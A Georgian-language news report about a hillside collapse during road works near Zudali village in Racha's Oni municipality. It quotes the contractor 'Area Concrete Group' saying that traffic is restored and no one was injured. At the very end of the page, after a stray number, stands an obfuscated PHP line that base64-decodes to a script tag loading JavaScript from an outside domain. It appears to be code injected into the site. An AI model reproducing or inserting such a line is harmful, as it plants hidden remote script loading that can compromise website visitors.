celsiusi
ავერსი საქკაბელი

მიმდინარე ეტაპზე მიმდინარეობდა რკინა-ბეტონის კედლის მშენებლობა, რა დროსაც მოხდა გამოფიტული ფერდობის ჩამოშლა, რამაც გამოიწვია სავალი გზის შევიწროება, – ამის შესახებ „არეა ქონქრეთ ჯგუფის“ წარმომადგენელმა, ვაჟა დონდუამ განაცხადა რაჭაში, ონის მუნიციპალიტეტის სოფელ ზუდალში, სადაც ქუთაისი (ჭომა)-ალპანა-მამისონის უღელტეხილისა და საჩხერე-რაჭის დამაკავშირებელ გზაზე მიმდინარე სამუშაოებისას მიწის მასა ჩამოიშალა.

აღნიშნულ მონაკვეთზე გზის სამშენებლო სამუშაოებს კომპანია „არეა ქონქრეთ ჯგუფი“ ასრულებს.

როგორც კომპანიის წარმომადგენელი განმარტავს, მიწის ჩამოშლის გამეორების საფრთხე არ არსებობს.

„ბეტონის მასა არ არის ჩამოსული. ჩამოსულია ფერდი, რომელიც იყო გამოფიტული, თუმცა ამ ყოველივეს მოველოდით. აქედან გამომდინარე, უსაფრთხოების ზომების მაქსიმალური გათვალისწინებით მოხდა გზის სავალი ნაწილის შემცირება. აღნიშნული ადგილი პარაპეტებით არის შემოსაზღვრული. საგზაო მოძრაობა სრულად აღდგენილია და შეფერხება არ აქვს არცერთ სატრანსპორტო საშუალებას. მიმდინარე ეტაპზე გამეორების საფრთხე არ არსებობს. საბოლოო ჯამში, მიზანი არის ახალი ხიდის მშენებლობა. აქ გაივლის ონის მიმართულებით გზა“, – განაცხადა „არეა ქონქრეთ ჯგუფის“ წარმომადგენელმა.

ამასთან, ქუთაისი (ჭომა)-ალპანა-მამისონის უღელტეხილისა და საჩხერე-რაჭის დამაკავშირებელ გზაზე მიმდინარე სამუშაოებისას მიწის ჩამოშლის შესახებ ინფორმაცია გაავრცელა საავტომობილო გზების დეპარტამენტმაც. მათი ინფორმაციით, აღნიშნულ მონაკვეთზე არსებული კედელი იყო დაბზარული, რის გამოც გზის სავალი ნაწილი შემოსაზღვრული იყო პარაპეტებით და მოძრაობა მიმდინარეობდა მხოლოდ ერთ ზოლში. შემთხვევის შედეგად არავინ დაშავებულა.

436
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");